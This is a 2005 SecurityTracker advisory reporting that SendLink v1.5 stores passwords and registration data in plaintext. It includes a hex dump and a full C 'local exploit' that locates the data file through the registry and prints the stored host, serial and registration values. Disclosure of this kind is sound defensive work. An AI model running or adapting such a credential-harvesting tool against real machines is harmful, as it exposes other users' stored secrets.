SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Generic)  >   SendLink Vendors:   Computer Knacks, Inc.
SendLink Discloses Passwords to Local Users
SecurityTracker Alert ID:  1013269
SecurityTracker URL:  http://securitytracker.com/id/1013269
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Feb 23 2005
Impact:   Disclosure of authentication information

Version(s): 1.5
Description:   Kozan reported a vulnerability in SendLink. A local user can obtain passwords.

The software stores passwords in 'Program Files\SendLink\User\data.eat' in plaintext form. A local user can view the file to obtain the passwords.

Impact:   A local user can obtain passwords.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.computerknacks.com/ (Links to External Site)
Cause:   Access control error
Underlying OS:  Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  SendLink v1.5 discloses passwords to local users.


---------------------
Application:
---------------------


SendLink v1.5


---------------------
Introduction:
---------------------

Vendor: Computer Knacks
http://www.computerknacks.com/

Vendor Description: Share your files and folders by emailing tiny 'links'
to the people you want to share with. SendLink allows you to share either
individual files or entire folders--up to your whole hard drive--with a
single link. The recipient of your file-sharing email simply clicks on these
links to download directly from your PC to theirs using software every
Internet user already has, the same exact way they would download files from
a Web site. Version 1.5 improvements: the new 'SendTo' feature integrates
SendLink into the Windows Explorer SendTo menu, further simplifying the
process of creating and sending links.



---------------------
Bug:
---------------------


SendLink v1.5 stores all the information and passwords in
"Program Files\SendLink\User\data.eat"
file with plain text format without crypting and can be viewed
by a local user with a hex editor.


An example hex editor output:

00000038 686F 7374 6970 BB3D AB31 302E 302E 302E 36BB 20AB 686F 7374 6E61 6D65
hostip.=.10.0.0.6. .hostname
00000054 BB3D AB68 6F73 746E 616D 6531 BB20 AB73 6572 6961 6CBB 3DAB 5345 5249
.=.hostname1. .serial.=.SERI
00000070 414C 4E55 4D42 4552 BB20 AB6F 7074 696F 6E73 BB3D AB50 524F 4455 4354
ALNUMBER. .options.=.PRODUCT
0000008C 4F50 5449 4F4E 53BB 20AB 7265 6763 6F64 65BB 3DAB 5245 4743 4F44 45BB
OPTIONS. .regcode.=.REGCODE.
000000A8 20AB 686F 7374 706F 7274 BB3D AB34 3931 3732 BB                       
.hostport.=.49172.


---------------------
Vendor Confirmed:
---------------------
No.


---------------------
Fix:
---------------------
There is no solution at the time of this entry.



---------------------
Exploit:
---------------------



/*****************************************************************

SendLink v1.5 Local Exploit by Kozan

Application: SendLink v1.5
Vendor:Computer Knacks
http://www.computerknacks.com/

Vulnerable Description: SendLink v1.5 discloses passwords to local users.

Discovered & Coded by: Kozan
Credits to ATmaCA
Web : www.netmagister.com
Web2: www.spyinstructors.com
Mail: kozan[at]netmagister[dot]com

*****************************************************************/

#include <windows.h>
#include <stdio.h>
#include <string.h>

#define BUFSIZE 100
HKEY hKey;
char prgfiles[BUFSIZE];
DWORD dwBufLen=BUFSIZE;
LONG lRet;

char *hostip, *hostname, *serial, *options, *regcode, *hostport;

int adresal(char *FilePath,char *Str)
{
       char kr;
       int Sayac=0;
       int Offset=-1;
       FILE *di;
       di=fopen(FilePath,"rb");

       if( di == NULL )
       {
               fclose(di);
               return -1;
       }

       while(!feof(di))
       {
               Sayac++;
               for(int i=0;i<strlen(Str);i++)
               {
                       kr=getc(di);
                       if(kr != Str[i])
                       {
                               if( i>0 )
                               {
                                       fseek(di,Sayac+1,SEEK_SET);
                               }
                               break;
                       }
                       if( i > ( strlen(Str)-2 ) )
                       {
                               Offset = ftell(di)-strlen(Str);
                               fclose(di);
                               return Offset;
                       }
               }
       }
       fclose(di);
       return -1;
}

char *oku(char *FilePath,char *Str)
{

       FILE *di;
       char cr;
           char BB = 0xBB;
       int i=0;
       char Feature[500];

       int Offset = adresal(FilePath,Str);

       if( Offset == -1 )
               return "";

       if( (di=fopen(FilePath,"rb")) == NULL )
               return "";

       fseek(di,Offset+strlen(Str),SEEK_SET);

       while(!feof(di))
       {
               cr=getc(di);
               if(cr == BB)
                           break;

               Feature[i] = cr;
               i++;
       }

       Feature[i] = '\0';
       fclose(di);
       return Feature;
}

int main(void)
{
        if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,
                   "SOFTWARE\\Microsoft\\Windows\\CurrentVersion",
                   0,
                   KEY_QUERY_VALUE,
                   &hKey) == ERROR_SUCCESS)
        {

                lRet = RegQueryValueEx( hKey, "ProgramFilesDir", NULL, NULL,
                                                                (LPBYTE)
prgfiles, &dwBufLen);

                if( (lRet != ERROR_SUCCESS) || (dwBufLen > BUFSIZE) )
                {
                        RegCloseKey(hKey);
            printf("An error occured!\n");
                        return 0;
                }

       RegCloseKey(hKey);

        }
        else
    {
                RegCloseKey(hKey);
        printf("An error occured!\n");
                return 0;
        }

        strcat(prgfiles,"\\SendLink\\User\\data.eat");

        printf("SendLink v1.5 Local Exploit by Kozan\n");
        printf("Credits to ATmaCA\n");
        printf("www.netmagister.com  -  www.spyinstructors.com \n\n");

        try
        {
                char hostip_temp[BUFSIZE];
                wsprintf(hostip_temp,"hostip%c=%c",0xBB,0xAB);
                hostip=oku(prgfiles,hostip_temp);
                printf("Host IP: %s\n",hostip);

                char hostname_temp[BUFSIZE];
                wsprintf(hostname_temp,"hostname%c=%c",0xBB,0xAB);
                hostname=oku(prgfiles,hostname_temp);
                printf("Hostname                        : %s\n",hostname);

                char hostport_temp[BUFSIZE];
                wsprintf(hostport_temp,"hostport%c=%c",0xBB,0xAB);
                hostport=oku(prgfiles,hostport_temp);
                printf("Host Port                        : %s\n",hostport);

                char options_temp[BUFSIZE];
                wsprintf(options_temp,"options%c=%c",0xBB,0xAB);
                options=oku(prgfiles,options_temp);
                printf("Options                                : %s\n",options);

                char serial_temp[BUFSIZE];
                wsprintf(serial_temp,"serial%c=%c",0xBB,0xAB);
                serial=oku(prgfiles,serial_temp);
                printf("Serial                                : %s\n",hostip);

                char regcode_temp[BUFSIZE];
                wsprintf(regcode_temp,"regcode%c=%c",0xBB,0xAB);
                regcode=oku(prgfiles,regcode_temp);
                printf("Registration Code        : %s\n",regcode);

        }catch(...){ printf("An error occured!\n"); return 0; }

        return 0;

}



Kozan...
 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2020, SecurityGlobal.net LLC